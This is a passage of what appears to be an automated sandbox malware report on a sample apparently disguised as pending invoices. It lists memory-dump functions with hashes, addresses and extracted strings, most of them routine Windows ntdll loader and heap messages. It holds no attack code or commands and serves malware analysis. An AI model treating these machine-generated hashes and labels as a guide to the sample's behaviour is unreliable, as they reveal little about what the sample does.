                                • Opcode Fuzzy Hash: d91876eeef8e8ff8c8445082963cc38fb000e208b8654bc77eefd9ea4c4e23a2
                                • Instruction Fuzzy Hash: 1B416CB9A01209ABDB01DF99C980ADEBBB5BF49314F20015AED05E7351DB719A51CBA0
                                Function 3258FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                • API String ID: 3446177414-3492000579
                                • Opcode ID: 881e2f060d5e99e3b46bc3993af7174ef00a5e437bd497e391f6d43fce130f18
                                • Instruction ID: 954255f8af51d74c908e99da339fbb3ccfa2389798b74d7203ca4ac1c62395d5
                                • Opcode Fuzzy Hash: 881e2f060d5e99e3b46bc3993af7174ef00a5e437bd497e391f6d43fce130f18
                                • Instruction Fuzzy Hash: 0A71CD36A01284DFDB05CFA8D4506ADFBF2FF8A314F848499E445EB252CBB59A81CF50
                                Function 324D65B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 32539AC5, 32539B06
                                • LdrpLoadShimEngine, xrefs: 32539ABB, 32539AFC
                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32539AB4
                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32539AF6
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-3589223738
                                • Opcode ID: 8c48ac997cd39d5227fbe8778d6a9cc4b56629f90d16bed4d0cff23f7f40b4c9
                                • Instruction ID: 92b6091c5148de257bb46dc8a110bc3fc4a3df3acae395308b842a9fbb217cb6
                                • Opcode Fuzzy Hash: 8c48ac997cd39d5227fbe8778d6a9cc4b56629f90d16bed4d0cff23f7f40b4c9
                                • Instruction Fuzzy Hash: 0E51F575B413589FDB08EFA8C854B9D77B2AB84304F440559F541FB296CBB09E81CB90
                                Function 32509803 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 179timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: @3]2$LdrpUnloadNode$Unmapping DLL "%wZ"$df]2@3]2@3]2$minkernel\ntdll\ldrsnap.c
                                • API String ID: 3446177414-2199215269
                                • Opcode ID: ccfe33f67f13942fdc4c412ccd2e3244d637cd9fa139af4e82864f77ce2e5e59
                                • Instruction ID: f2a30507c33089e00bbf203638738998d33f3a16430b8d06d9f7585ffd15d125
                                • Opcode Fuzzy Hash: ccfe33f67f13942fdc4c412ccd2e3244d637cd9fa139af4e82864f77ce2e5e59
                                • Instruction Fuzzy Hash: 98512675605302AFE714DF38CC84B19BB90BFC4B24F448A6DE89597288DB70AB45CF95
                                Function 3258F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3258F263
                                • HEAP: , xrefs: 3258F15D
                                • ---------------------------------------, xrefs: 3258F279
                                • Entry Heap Size , xrefs: 3258F26D
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                • API String ID: 3446177414-1102453626
                                • Opcode ID: 3c9618128352ed0f4f2eb31feef9251e2cbf86acb719fb4a5b2da63644665b3c
                                • Instruction ID: 507a0cd4657c6032799aed3923a980e458c40a67aa6089b1062eb11ada342c20
                                • Opcode Fuzzy Hash: 3c9618128352ed0f4f2eb31feef9251e2cbf86acb719fb4a5b2da63644665b3c
                                • Instruction Fuzzy Hash: 1441AE39B41216DFC704CF18C880A59BBF5EF4935575584AAE809EB311DBB1EE42CB90
                                Function 3250DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                • API String ID: 3446177414-1222099010
                                • Opcode ID: 1578f5873bd7599fdc943bbd9e3ec46e0bc7963fb63f8897bf6bebd16b3ac65c
                                • Instruction ID: f200e637fe0b15a029315a7394ccc8750d9f24fd712a151154da10191ab07996
                                • Opcode Fuzzy Hash: 1578f5873bd7599fdc943bbd9e3ec46e0bc7963fb63f8897bf6bebd16b3ac65c
                                • Instruction Fuzzy Hash: 16312535106780DFF716CB28CD15F9ABBE4EF01750F008489E84697B52CFB8AA81CE21
                                Function 325B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                • Instruction ID: fd22b2a2a553bce52438e2449cf2cea6e0cee7aee3633b853911d3002104ffdc
                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                • Instruction Fuzzy Hash: EB0214B5509341AFDB04CF18C590A6FBBE5EFC8704F80892DF9984B2A4DB71EA45CB42
                                Function 3252B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-$0$0
                                • API String ID: 1302938615-699404926
                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction ID: bc163107d90d8e9ee18d465e387ab9cda10cdb5de984a276ddaa0f26e2bd14d8
                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction Fuzzy Hash: 5281E4B8E053498EEF08CF68C8917EEBFB2AF45364F584659D861A72D1CB349B40CB51
                                Function 324E9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$@
                                • API String ID: 3446177414-1194432280
                                • Opcode ID: 12da7916babb7c62109e1bf10582a580622b2bf8d3dccc8ca320961cc4274895
                                • Instruction ID: fd56cd002e8a0fe9b14acf581c40e55f44b8ba2df3e16efefbcb6b3f360d7401
                                • Opcode Fuzzy Hash: 12da7916babb7c62109e1bf10582a580622b2bf8d3dccc8ca320961cc4274895
                                • Instruction Fuzzy Hash: 6A8129B5D002699BEB21CF54CC44BDEB7B4AB48754F4045EAE909F7280EB709E85CFA0
                                Function 32514D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • LdrpFindDllActivationContext, xrefs: 32553636, 32553662
                                • Querying the active activation context failed with status 0x%08lx, xrefs: 3255365C
                                • minkernel\ntdll\ldrsnap.c, xrefs: 32553640, 3255366C
                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3255362F
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                • API String ID: 3446177414-3779518884
                                • Opcode ID: ee150ec2682e801c25f1851d5e49ce9c4b008fc02d11bdedf0085a4222688856
                                • Instruction ID: cfcc74cafb6ffaa16b12e78c9aa343fc58ec4232ecfd19d7b5df87a71769414d
                                • Opcode Fuzzy Hash: ee150ec2682e801c25f1851d5e49ce9c4b008fc02d11bdedf0085a4222688856
                                • Instruction Fuzzy Hash: DF314076900751BAFF11AF44C884B567BB4AB0179BF42646AE809A7150EF60BFC0C7D5
                                Function 3250245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                Download Yara Rule
                                Strings
                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3254A992
                                • minkernel\ntdll\ldrinit.c, xrefs: 3254A9A2
                                • LdrpDynamicShimModule, xrefs: 3254A998
                                • TGK2, xrefs: 32502462
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGK2$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1393885241
                                • Opcode ID: 7e50783013f01842094e59aa888172b0c2a12630a2d8f52841c3b27e100770d4
                                • Instruction ID: 2043045adbdb4dec5003f57811e6a89c829405eb296263edad3fd708a37b1d5e
                                • Opcode Fuzzy Hash: 7e50783013f01842094e59aa888172b0c2a12630a2d8f52841c3b27e100770d4
                                • Instruction Fuzzy Hash: 44312675A81301ABF7149F69C895B5ABBB4FB84754F52445AF800F7251CFB09B82CF90
                                Function 325920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$[$]:%u
                                • API String ID: 48624451-2819853543
                                • Opcode ID: e4eacbd5094af22331f53ef34e065fbcc97fb693b3253073d459cc00514a5b1e
                                • Instruction ID: 5ff7a27c09c04d379249763f155ee61a333dc31a897c4d2c2f4867eb5d589d4d
                                • Opcode Fuzzy Hash: e4eacbd5094af22331f53ef34e065fbcc97fb693b3253073d459cc00514a5b1e
                                • Instruction Fuzzy Hash: 2B2153BAE00219ABD740DE69DC40AEE7BE8EF54794F840116E905E3240EB30DB119FA1
                                Function 324DF910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 3446177414-3610490719
                                • Opcode ID: 0ad4723b57e33a9136dc9311199e13c79a016e269f0c28d0b676b1f4545efad8
                                • Instruction ID: a7b8aa8c579dac9b7ea507c8c2ba0d76af1c0ea1ed61bd474a7309ad2719d3ce
                                • Opcode Fuzzy Hash: 0ad4723b57e33a9136dc9311199e13c79a016e269f0c28d0b676b1f4545efad8
                                • Instruction Fuzzy Hash: B3911371B41781DFE326CB24C8B4B6ABBE4BF80754F010459EA409B392DB74EA41CBD2
                                Function 32500BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 3254A121
                                • LdrpCheckModule, xrefs: 3254A117
                                • Failed to allocated memory for shimmed module list, xrefs: 3254A10F
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-161242083
                                • Opcode ID: 7e322bd6f8e840a473232071754339cce58bef6f1192520282dce42da5b057df
                                • Instruction ID: 17f7dc5b507d77d887af04e83a877e286c289d8277485ea225e3650ea63f162f
                                • Opcode Fuzzy Hash: 7e322bd6f8e840a473232071754339cce58bef6f1192520282dce42da5b057df
                                • Instruction Fuzzy Hash: 3971A075A412059FEB08DF68C955BAEBBF4FB88304F14846DE805E7250EB74AB86CF50
                                Function 325B8927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                Download Yara Rule
                                APIs
                                • RtlDebugPrintTimes.NTDLL ref: 325B8B03
                                • RtlDebugPrintTimes.NTDLL ref: 325B8B5B
                                  • Part of subcall function 32522B60: LdrInitializeThunk.NTDLL ref: 32522B6A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes$InitializeThunk
                                • String ID: $File
                                • API String ID: 1259822791-2412145507
                                • Opcode ID: c54992f9d7a2b08fa81ebbd16c89eaf3bc148850f460bb97892005e12e8b2244
                                • Instruction ID: 73b82e780af1eee960c805dda30751d84dc7cbb1eac25f17eb79e63bfd76ad52
                                • Opcode Fuzzy Hash: c54992f9d7a2b08fa81ebbd16c89eaf3bc148850f460bb97892005e12e8b2244
                                • Instruction Fuzzy Hash: BE619B72A1022CABDF26CF24DC55BE9BBB9AF48710F4055A9A909E61C1DB709F84CF50
                                Function 3251C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 325582E8
                                • LdrpInitializePerUserWindowsDirectory, xrefs: 325582DE
                                • Failed to reallocate the system dirs string !, xrefs: 325582D7
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-1783798831
                                • Opcode ID: d95148c6d63d2ec55a885ddc2a5d1120c8d46c40b2a084907b84979006ae6aef
                                • Instruction ID: 2eb8cbcec8c1c1b3b965d4c2dd994772c0a45243c23909f9c6b94a4c0aff4ac1
                                • Opcode Fuzzy Hash: d95148c6d63d2ec55a885ddc2a5d1120c8d46c40b2a084907b84979006ae6aef
                                • Instruction Fuzzy Hash: 2E410975946300ABEB10EF64DC45B5B7BE8EF84751F40492EF844E3250EBB1EA41CB92
                                Function 3251BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                Download Yara Rule
                                Strings
                                • RTL: Re-Waiting, xrefs: 32557BAC
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 32557B7F
                                • RTL: Resource at %p, xrefs: 32557B8E
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 0-871070163
                                • Opcode ID: 91e8e15e33c59c8d9f511d7b206c46f96b8433ad54c02c8c426f9982d7de624b
                                • Instruction ID: 502ee7e289418132fda2c8a7f604dac5db372e3555b5f2f9dfa8077befb08110
                                • Opcode Fuzzy Hash: 91e8e15e33c59c8d9f511d7b206c46f96b8433ad54c02c8c426f9982d7de624b
                                • Instruction Fuzzy Hash: 0041D1397017029FEB14CE25D940B5ABBE5EF88720F500A1DF956DB680EB71FA05CB91
                                Function 3251B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                Download Yara Rule
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3255728C
                                Strings
                                • RTL: Re-Waiting, xrefs: 325572C1
                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 32557294
                                • RTL: Resource at %p, xrefs: 325572A3
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-605551621
                                • Opcode ID: 56fc9847e80e36369e6218b6af5bf897bf78da52f5eff34842e1115e25f0d204
                                • Instruction ID: f7ecdd40a9202e6e44c335d35fca12d86d0662e30116b86a5965dcebf471c978
                                • Opcode Fuzzy Hash: 56fc9847e80e36369e6218b6af5bf897bf78da52f5eff34842e1115e25f0d204
                                • Instruction Fuzzy Hash: A441D035A00202ABEB10CE25CC41B56BBA5FF94714F604A1AF955EB280DB71FA46CBD1
                                Function 32564755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • minkernel\ntdll\ldrredirect.c, xrefs: 32564899
                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32564888
                                • LdrpCheckRedirection, xrefs: 3256488F
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                • API String ID: 3446177414-3154609507
                                • Opcode ID: 720c6764180e97d50724f11fa0cd81d3111cfb79b975963ee487822ae4693116
                                • Instruction ID: 7bb9180372d229bd053787ad11e9438e16dfc0bb0f27ac926c9ac04e3a0d85b6
                                • Opcode Fuzzy Hash: 720c6764180e97d50724f11fa0cd81d3111cfb79b975963ee487822ae4693116
                                • Instruction Fuzzy Hash: 1A41D576A057919FDB31CF58C940A267BE4EF897AAF011659FC44E7311DB30DA01CB91
                                Function 32592300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$]:%u
                                • API String ID: 48624451-3050659472
                                • Opcode ID: e498e6449ced8da1ae2da090080279e39c546050b8240a1ce9aad4349c04ddd1
                                • Instruction ID: 63a854dedf45e290fe31654cc53dadebe3f56fe7a9664bdcbb50b22552b2faf9
                                • Opcode Fuzzy Hash: e498e6449ced8da1ae2da090080279e39c546050b8240a1ce9aad4349c04ddd1
                                • Instruction Fuzzy Hash: 51316176A102199FDB54CE29DC40BEE7BF8EB44754F80459AE849E3240EF30AB458FA0
                                Function 32565F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
